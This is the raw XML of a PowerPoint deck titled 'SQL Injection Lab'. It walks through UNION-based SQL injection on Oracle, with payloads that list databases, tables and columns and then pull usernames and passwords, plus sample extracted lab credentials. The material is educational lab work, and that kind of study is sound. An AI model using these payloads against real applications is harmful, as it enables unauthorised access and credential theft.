              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> WHERE  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> = 'USERS‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>1. Use the following payload to retrieve the list of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t> database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>UNION SELECT SYS.DATABASE_NAME,NULL FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>DUAL--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>the following payload to retrieve the list of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t> tables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0" smtClean="0"/>
              <a:t>database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>‘ UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, NULL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>all_tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>3.Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>the following payload (replacing the table name) to retrieve the details of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	'UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>column_name,NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>all_tab_columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> ='USER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>$'—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>4. To find information of username and password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	‘ UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>username_jovsyx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>password_abwqcw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>users_uvlvoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22302169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GB" u="sng" dirty="0"/>
              <a:t>Retrieving multiple values within a single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
              <a:t>column/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
              <a:t>concatenation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>You can easily retrieve multiple values together within this single column by concatenating the values together, ideally including a suitable separator to let you distinguish the combined values. For example, on Oracle you could submit the input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	' UNION SELECT username || '~' || password FROM users--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>This uses the double-pipe sequence || which is a string concatenation operator on Oracle. The injected query concatenates together the values of the username and password fields, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>separated by the ~ character.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>administrator~s3cure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>wiener~peter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>carlos~montoya</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22581789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1644</TotalTime>
  <Words>864</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>216</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Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>SQL Injection Lab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Injection Lab</dc:title>
  <dc:creator>ROCKTIM</dc:creator>
  <cp:lastModifiedBy>ROCKTIM</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-11T04:17:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-14T11:37:32Z</dcterms:modified>
</cp:coreProperties>
</file>